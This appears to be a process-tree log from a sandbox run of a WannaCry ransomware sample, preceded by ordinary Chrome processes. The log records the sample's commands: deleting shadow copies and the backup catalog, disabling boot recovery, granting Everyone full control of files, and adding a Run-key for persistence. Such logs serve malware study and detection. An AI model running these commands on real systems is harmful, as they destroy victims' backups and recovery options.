"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1616 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:2
2⤵
PID:68

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1692 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:8
2⤵
PID:4472

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1924 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:8
2⤵
PID:4308

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1636 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:1
2⤵
PID:2888

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2984 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:1
2⤵
PID:1368

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4496 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:1
2⤵
PID:2540

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4500 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:8
2⤵
PID:5076

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4712 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:8
2⤵
PID:4500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:8
2⤵
PID:1628

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5024 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:8
2⤵
PID:4348

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4948 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:1
2⤵
PID:3244

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5028 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:8
2⤵
PID:4664

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3848 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:8
2⤵
PID:5040

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=1916 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:1
2⤵
PID:2640

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4704 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:1
2⤵
PID:2800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2636 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3256

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=3140 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:1
2⤵
PID:1160

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=1580 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:8
2⤵
PID:2756

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2616 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:8
2⤵
PID:2568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=4796 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:1
2⤵
PID:1156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5172 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:1
2⤵
PID:4568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5036 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:8
2⤵
PID:1832

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5488 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:8
2⤵
PID:792

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=3732 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:1
2⤵
PID:2808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=3004 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:1
2⤵
PID:296

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4464 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:8
2⤵
PID:808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3620 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:8
2⤵
PID:3256

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5696 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:8
2⤵
PID:3628

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=5736 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:1
2⤵
PID:5036

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=5832 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:1
2⤵
PID:3036

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6032 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:8
2⤵
PID:2736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6188 --field-trial-handle=1884,i,16676332605355789703,2213538308493621238,131072 /prefetch:8
2⤵
PID:740

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4944

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x408
1⤵
PID:524

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2340

C:\Users\Admin\Downloads\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
"C:\Users\Admin\Downloads\Ransomware.WannaCry\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
1⤵
- Drops startup file
- Sets desktop wallpaper using registry
PID:2872

C:\Windows\SysWOW64\attrib.exe
attrib +h .
2⤵
- Views/modifies file attributes
PID:3364

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:4208

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:2548

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 202701719910891.bat
2⤵
PID:736

C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
3⤵
PID:4304

C:\Windows\SysWOW64\attrib.exe
attrib +h +s F:\$RECYCLE
2⤵
- Views/modifies file attributes
PID:3936

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected] co
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:508

C:\Users\Admin\Downloads\Ransomware.WannaCry\TaskData\Tor\taskhsvc.exe
TaskData\Tor\taskhsvc.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3452

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @[email protected] vs
2⤵
PID:2300

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected] vs
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3256

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
4⤵
PID:4224

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:2128

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
5⤵
PID:2064

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
- Executes dropped EXE
PID:3556

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Checks computer location settings
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2876

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "wbaseltcdk426" /t REG_SZ /d "\"C:\Users\Admin\Downloads\Ransomware.WannaCry\tasksche.exe\"" /f
2⤵
PID:4588

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "wbaseltcdk426" /t REG_SZ /d "\"C:\Users\Admin\Downloads\Ransomware.WannaCry\tasksche.exe\"" /f
3⤵
- Adds Run key to start application
- Modifies registry key
PID:1204

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:3872

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:4828

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
- Executes dropped EXE
PID:4440

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1400

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:2764

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
- Executes dropped EXE
PID:2852

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3556

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:4676

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
- Executes dropped EXE
PID:1940

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5000

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:808

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
- Executes dropped EXE
PID:2140

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4572

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:3460

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
- Executes dropped EXE
PID:2616

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2944

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:1540

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
- Executes dropped EXE
PID:216

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4260

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:3960

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
- Executes dropped EXE
PID:2032

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3564

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:580

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
- Executes dropped EXE
PID:4808

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3344

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:3776

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
- Executes dropped EXE
PID:4652

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1892

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:1880

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
- Executes dropped EXE
PID:2320

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5048

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
- Executes dropped EXE
PID:4368

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4208

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:1756

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
- Executes dropped EXE
PID:2812

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5024

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:5076

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
- Executes dropped EXE
PID:2300

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1596

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:1940

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
- Executes dropped EXE
PID:4936

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4748

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:3000

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
- Executes dropped EXE
PID:2208

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1968

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:3672

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
- Executes dropped EXE
PID:2736

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2804

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:2928

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
- Executes dropped EXE
PID:1300

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4292

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:2548

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
- Executes dropped EXE
PID:2692

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1864

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:3468

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
- Executes dropped EXE
PID:3040

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2196

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
PID:864

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
PID:4588

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Suspicious use of SetWindowsHookEx
PID:4956

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
PID:4592

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
PID:1088

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Suspicious use of SetWindowsHookEx
PID:1452

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
PID:4936

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
PID:2072

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Suspicious use of SetWindowsHookEx
PID:1912

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
PID:2320

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
PID:4420

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Suspicious use of SetWindowsHookEx
PID:1376

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
PID:3128

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
PID:3476

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Suspicious use of SetWindowsHookEx
PID:672

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
PID:2844

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
PID:1384

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Suspicious use of SetWindowsHookEx
PID:1232

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
PID:1280

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
PID:4260

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Suspicious use of SetWindowsHookEx
PID:596

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
PID:5024

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
PID:2168

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Suspicious use of SetWindowsHookEx
PID:2972

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
PID:1036

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
PID:2332

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Suspicious use of SetWindowsHookEx
PID:2632

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
PID:3608

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
PID:2696

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Suspicious use of SetWindowsHookEx
PID:4004

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskdl.exe
taskdl.exe
2⤵
PID:1088

C:\Users\Admin\Downloads\Ransomware.WannaCry\taskse.exe
taskse.exe C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
2⤵
PID:3516

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]
@[email protected]
2⤵
- Suspicious use of SetWindowsHookEx
PID:808

